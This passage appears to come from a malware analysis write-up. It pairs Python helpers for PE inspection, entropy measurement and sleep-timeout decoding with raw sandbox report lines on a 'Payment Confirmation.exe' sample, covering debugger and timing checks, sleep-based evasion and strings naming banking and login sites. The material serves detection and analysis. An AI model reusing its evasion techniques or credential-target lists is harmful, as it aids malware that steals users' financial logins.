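from collections import Counter
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {           # IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def shannon_entropy(seq):
    """Bits per symbol of a bytes or str value (8.0 is the maximum for bytes)."""
    if not seq:
        return 0.0
    n = len(seq)
    return -sum(c / n * math.log2(c / n) for c in Counter(seq).values())


def pseudo_random_bytes(n, seed=b"joe-1665536"):
    """Deterministic high-entropy filler standing in for a packed .text section."""
    out = bytearray()
    for i in range((n + 31) // 32):
        out += hashlib.sha256(seed + i.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_sample_pe(timestamp=0xC0F8C2D1, dll_characteristics=0x8540, text=None):
    """Minimal PE32 (constructed, not the real sample): DOS stub, COFF header,
    224-byte optional header and one .text section holding `text`."""
    text = pseudo_random_bytes(4096) if text is None else text
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)          # DllCharacteristics
    raw_ptr = len(dos) + 4 + len(coff) + len(opt) + 40            # after the section table
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text),
                          raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + bytes(opt) + section + text


def inspect_pe(data, now=None, packed_threshold=7.0):
    """Decode DllCharacteristics, compare the build timestamp with `now` and
    compute per-section entropy; returns a dict of findings."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    dll_chars = struct.unpack_from("<H", data, opt_off + 70)[0]
    flags = [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit]
    sections = {}
    for i in range(nsec):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt_off + opt_size + i * 40)
        sections[name.rstrip(b"\0").decode("ascii")] = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
    built = datetime.fromtimestamp(ts, timezone.utc)
    return {
        "timestamp": ts,
        "built": built,
        "timestamp_in_future": built > (now or datetime.now(timezone.utc)),
        "dll_characteristics": flags,
        "section_entropy": sections,
        "likely_packed": any(e > packed_threshold for e in sections.values()),
    }


# Method names copied from the report's RXv2gXFWfOHdOu5o4x.cs finding, plus a
# constructed set of ordinary WinForms-style names for comparison.
OBFUSCATED_NAMES = ["Dispose", "RXvF2gXWf", "n2Bp3KX6LyhTbP96rs", "HAstR11TVar3Xj672y",
                    "xsAVXGkykj1GusshJD", "JGFM2jecZvOttkGp4k", "HHpSMXNqrPUQ9uRakI",
                    "ranpYVVsY7udN56k77", "p5pu9YMFbrUFoKYFkw", "AbP9nkAg30G7nF7ARo"]
ORDINARY_NAMES = ["Dispose", "ToString", "GetHashCode", "Equals", "Initialize",
                  "LoadSettings", "SaveSettings", "OnClosing", "UpdateTitle", "ProcessDialogKey"]


def method_name_entropy(names):
    """Entropy of the concatenated identifiers; renamed .NET methods draw from
    the whole [A-Za-z0-9] alphabet and score well above hand-written names."""
    return shannon_entropy("".join(names))


if __name__ == "__main__":
    print(inspect_pe(build_sample_pe()))
    print("obfuscated %.2f vs ordinary %.2f bits/char" % (
        method_name_entropy(OBFUSCATED_NAMES), method_name_entropy(ORDINARY_NAMES)))
```

A future TimeDateStamp by itself only proves the field was edited or the linker was told to randomise it (recent MSVC does this for reproducible builds), so it is a triage signal rather than a verdict; combined with a near-maximal .text entropy and a single-letter-salad method table it is what justifies the packed/obfuscated reading the report gives.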
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process information set: NOOPENFILEERRORBOX (42 identical entries)
                Source: C:\Windows\SysWOW64\auditpol.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: Payment Confirmation.exe PID: 7724, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7AD324
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7AD7E4
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7AD944
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7AD504
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7AD544
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7AD1E4
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7B0154
                Source: C:\Windows\SysWOW64\auditpol.exe | API/Special instruction interceptor: Address: 7FF84F7ADA44
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: 15B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: 3150000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: 2EB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: 97F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: A7F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: AA10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory allocated: BA10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A1096E rdtsc | 7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\auditpol.exe | Window / User API: threadDelayed 1304
                Source: C:\Windows\SysWOW64\auditpol.exe | Window / User API: threadDelayed 8669
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\auditpol.exe | API coverage: 2.6 %
                Source: C:\Users\user\Desktop\Payment Confirmation.exe TID: 7708 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\Payment Confirmation.exe TID: 7888 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028 | Thread sleep count: 1304 > 30
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028 | Thread sleep time: -2608000s >= -30000s
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028 | Thread sleep count: 8669 > 30
                Source: C:\Windows\SysWOW64\auditpol.exe TID: 8028 | Thread sleep time: -17338000s >= -30000s
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008 | Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008 | Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008 | Thread sleep time: -51000s >= -30000s
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008 | Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe TID: 8008 | Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\SysWOW64\auditpol.exe | Last function: Thread delayed (2 identical entries)
                Source: C:\Windows\SysWOW64\auditpol.exe | Code function: 10_2_0331C9F0 FindFirstFileW,FindNextFileW,FindClose | 10_2_0331C9F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Thread delayed: delay time: 30000
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Thread delayed: delay time: 922337203685477
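The sleep figures above are easier to read once they are mapped back to what the thread actually handed the kernel. A Sleep(ms) call reaches NtDelayExecution as a LARGE_INTEGER in 100 ns ticks: negative for a relative delay, LLONG_MIN (0x8000000000000000) for INFINITE, and a non-negative FILETIME for an absolute wake-up time. The example below is added here and is not Joe Sandbox code. It assumes, from the arithmetic in the report (1304 calls of one length sum to 2608000, and 922337203685477 is LLONG_MIN divided by 10,000), that the report prints the tick value divided by 10,000, so -30000 is Sleep(30000), one 30 s sleep, TID 8028 loops on Sleep(2000), and TID 7888 parked itself with an infinite wait. The events are constructed from the report's thread IDs and counts, and the "more than 30 calls / 30 s in total" verdict thresholds are assumptions modelled on the report's wording, not the sandbox's real rules.

```python
"""Decode NtDelayExecution timeouts and flag sleep-based sandbox evasion.

Added example, not Joe Sandbox code. Unit assumption: the report prints the
100 ns tick value divided by 10,000 (i.e. the Sleep() millisecond argument).
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

INFINITE_MS = 0xFFFFFFFF
INFINITE_TIMEOUT = -(2 ** 63)                  # LLONG_MIN, "wait forever"
TICKS_PER_SECOND = 10_000_000                  # 100 ns ticks
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def sleep_ms_to_timeout(ms):
    """What SleepEx() hands to NtDelayExecution for a millisecond argument."""
    if ms == INFINITE_MS:
        return INFINITE_TIMEOUT
    return -ms * 10_000


def decode_timeout(raw):
    """(kind, value): ('infinite', None), ('relative', seconds) or ('absolute', datetime)."""
    if raw == INFINITE_TIMEOUT:
        return ("infinite", None)
    if raw < 0:
        return ("relative", -raw / TICKS_PER_SECOND)
    return ("absolute", FILETIME_EPOCH + timedelta(microseconds=raw // 10))


def report_units(raw):
    """Render a timeout the way the report above prints it (assumed: ticks / 10,000,
    truncated toward zero, sign kept)."""
    return -((-raw) // 10_000) if raw < 0 else raw // 10_000


def summarize_sleeps(events, max_calls=30, max_total_s=30.0):
    """events: iterable of (tid, raw_timeout). Per-thread call count, cumulative
    relative delay and a verdict: too many calls, too long in total, or any
    infinite wait (a thread parked until the sandbox gives up)."""
    per_tid = defaultdict(lambda: {"calls": 0, "total_s": 0.0, "infinite": False})
    for tid, raw in events:
        kind, value = decode_timeout(raw)
        entry = per_tid[tid]
        entry["calls"] += 1
        if kind == "infinite":
            entry["infinite"] = True
        elif kind == "relative":
            entry["total_s"] += value
    for entry in per_tid.values():
        entry["suspicious"] = (entry["infinite"]
                               or entry["calls"] > max_calls
                               or entry["total_s"] >= max_total_s)
    return dict(per_tid)


# Constructed from the report: TID 7708 one 30 s sleep, TID 7888 an infinite
# wait, TID 8028 a 2 s sleep loop, TID 8008 a handful of short sleeps.
SAMPLE_EVENTS = (
    [(7708, sleep_ms_to_timeout(30_000))]
    + [(7888, sleep_ms_to_timeout(INFINITE_MS))]
    + [(8028, sleep_ms_to_timeout(2_000))] * 1304
    + [(8008, sleep_ms_to_timeout(1_000))] * 3
)

if __name__ == "__main__":
    for tid, entry in sorted(summarize_sleeps(SAMPLE_EVENTS).items()):
        print(tid, entry)
```

The practical consequence for detonation is the same whichever unit the report intends: a thread that sleeps forever and a thread that sleeps two seconds 1304 times both outlast a default analysis window, which is why the sandbox patches sleeps and why the auditpol.exe stage still reached only 2.6 % API coverage.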
                Source: f37-37I.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: f37-37I.10.dr | Binary or memory string: discord.comVMware20,11696428655f
                Source: f37-37I.10.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: block list test formVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: auditpol.exe, 0000000A.00000002.3729900422.00000000034D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6'
                Source: f37-37I.10.dr | Binary or memory string: global block list test formVMware20,11696428655
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: omVMware20,11696428655|UE
                Source: f37-37I.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ropeVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: f37-37I.10.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: f37-37I.10.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: f37-37I.10.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: f37-37I.10.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20k4u
                Source: f37-37I.10.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731393012.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1844478894.000002765BE1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: f37-37I.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696428655x
                Source: f37-37I.10.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: f37-37I.10.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: COM.HKVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: f37-37I.10.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: f37-37I.10.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: f37-37I.10.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: f37-37I.10.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20w&
                Source: f37-37I.10.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: auditpol.exe, 0000000A.00000002.3734426806.000000000870B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ansaction PasswordVMware20,11696428655x
                Source: f37-37I.10.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: f37-37I.10.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: f37-37I.10.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\auditpol.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A1096E rdtsc | 7_2_01A1096E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_00417D93 LdrLoadDll | 7_2_00417D93
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_019CA197 mov eax, dword ptr fs:[00000030h] | 7_2_019CA197 (3 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A8C188 mov eax, dword ptr fs:[00000030h] | 7_2_01A8C188 (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A10185 mov eax, dword ptr fs:[00000030h] | 7_2_01A10185
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A74180 mov eax, dword ptr fs:[00000030h] | 7_2_01A74180 (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A5019F mov eax, dword ptr fs:[00000030h] | 7_2_01A5019F (4 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01AA61E5 mov eax, dword ptr fs:[00000030h] | 7_2_01AA61E5
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A001F8 mov eax, dword ptr fs:[00000030h] | 7_2_01A001F8
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A961C3 mov eax, dword ptr fs:[00000030h] | 7_2_01A961C3 (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] | 7_2_01A4E1D0 (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A4E1D0 mov ecx, dword ptr fs:[00000030h] | 7_2_01A4E1D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] | 7_2_01A4E1D0 (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A00124 mov eax, dword ptr fs:[00000030h] | 7_2_01A00124
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h] | 7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h] | 7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h] | 7_2_01A7E10E (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h] | 7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h] | 7_2_01A7E10E (2 identical entries)
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h] | 7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov eax, dword ptr fs:[00000030h] | 7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7E10E mov ecx, dword ptr fs:[00000030h] | 7_2_01A7E10E
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A90115 mov eax, dword ptr fs:[00000030h] | 7_2_01A90115
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 7_2_01A7A118 mov ecx, dword ptr fs:[00000030h] | 7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov eax, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov eax, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A118 mov eax, dword ptr fs:[00000030h]7_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6154 mov eax, dword ptr fs:[00000030h]7_2_019D6154
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6154 mov eax, dword ptr fs:[00000030h]7_2_019D6154
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC156 mov eax, dword ptr fs:[00000030h]7_2_019CC156
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4164 mov eax, dword ptr fs:[00000030h]7_2_01AA4164
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA4164 mov eax, dword ptr fs:[00000030h]7_2_01AA4164
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov ecx, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A64144 mov eax, dword ptr fs:[00000030h]7_2_01A64144
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A68158 mov eax, dword ptr fs:[00000030h]7_2_01A68158
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A680A8 mov eax, dword ptr fs:[00000030h]7_2_01A680A8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A960B8 mov eax, dword ptr fs:[00000030h]7_2_01A960B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A960B8 mov ecx, dword ptr fs:[00000030h]7_2_01A960B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D208A mov eax, dword ptr fs:[00000030h]7_2_019D208A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C80A0 mov eax, dword ptr fs:[00000030h]7_2_019C80A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A560E0 mov eax, dword ptr fs:[00000030h]7_2_01A560E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A120F0 mov ecx, dword ptr fs:[00000030h]7_2_01A120F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC0F0 mov eax, dword ptr fs:[00000030h]7_2_019CC0F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D80E9 mov eax, dword ptr fs:[00000030h]7_2_019D80E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A520DE mov eax, dword ptr fs:[00000030h]7_2_01A520DE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA0E3 mov ecx, dword ptr fs:[00000030h]7_2_019CA0E3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE016 mov eax, dword ptr fs:[00000030h]7_2_019EE016
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A66030 mov eax, dword ptr fs:[00000030h]7_2_01A66030
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A54000 mov ecx, dword ptr fs:[00000030h]7_2_01A54000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A72000 mov eax, dword ptr fs:[00000030h]7_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CA020 mov eax, dword ptr fs:[00000030h]7_2_019CA020
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CC020 mov eax, dword ptr fs:[00000030h]7_2_019CC020
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2050 mov eax, dword ptr fs:[00000030h]7_2_019D2050
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FC073 mov eax, dword ptr fs:[00000030h]7_2_019FC073
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A56050 mov eax, dword ptr fs:[00000030h]7_2_01A56050
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8397 mov eax, dword ptr fs:[00000030h]7_2_019C8397
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8397 mov eax, dword ptr fs:[00000030h]7_2_019C8397
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C8397 mov eax, dword ptr fs:[00000030h]7_2_019C8397
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F438F mov eax, dword ptr fs:[00000030h]7_2_019F438F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F438F mov eax, dword ptr fs:[00000030h]7_2_019F438F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE388 mov eax, dword ptr fs:[00000030h]7_2_019CE388
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE388 mov eax, dword ptr fs:[00000030h]7_2_019CE388
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CE388 mov eax, dword ptr fs:[00000030h]7_2_019CE388
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DA3C0 mov eax, dword ptr fs:[00000030h]7_2_019DA3C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D83C0 mov eax, dword ptr fs:[00000030h]7_2_019D83C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A063FF mov eax, dword ptr fs:[00000030h]7_2_01A063FF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8C3CD mov eax, dword ptr fs:[00000030h]7_2_01A8C3CD
